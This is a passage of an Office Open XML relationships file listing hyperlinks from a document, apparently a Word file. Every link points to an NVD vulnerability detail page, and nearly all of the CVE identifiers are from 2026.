Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97885" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100372" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33639" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42323" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42324" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83591" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84279" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84280" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84281" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84862" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85750" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93303" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93654" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94573" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95864" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95866" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96039" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96568" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96752" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97060" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100555" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100598" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53626" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53629" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56723" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56724" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56727" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57449" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67408" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67419" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84464" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84465" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93306" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93365" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100419" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100504" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97589" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97608" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97609" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97926" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97931" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97953" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98027" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98029" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98030" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98041" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98083" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98150" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98154" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100187" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100377" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17545" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63207" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67226" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84461" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96875" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96876" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96877" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96878" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96879" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100540" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80431" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97846" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100584" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96448" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14181" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100192" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100501" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100531" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100536" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100538" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100566" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100582" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100594" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100595" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63431" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63432" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85274" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85289" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85291" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91767" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91768" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92573" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93030" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93899" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100529" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100546" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13179" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15273" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92746" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93656" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93747" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93897" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94376" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96766" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100177" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100190" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100556" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100577" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100591" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100592" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61837" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67223" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67225" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67230" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67242" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84463" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97863" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97886" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97895" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100237" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100521" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100522" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100523" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17577" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18311" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18312" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18320" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78393" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78902" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88996" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92212" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53627" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54790" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66071" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66073" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67411" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67412" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67413" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80432" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100574" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53628" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67222" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67227" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67415" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86066" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91766" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92842" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93477" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93682" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95835" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100547" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100569" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100581" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12037" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97222" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97877" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97878" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97879" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100303" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100388" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100524" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100528" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100549" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100550" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100562" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100563" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100564" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100576" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100593" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93366" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100230" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100304" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100306" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100378" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100379" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 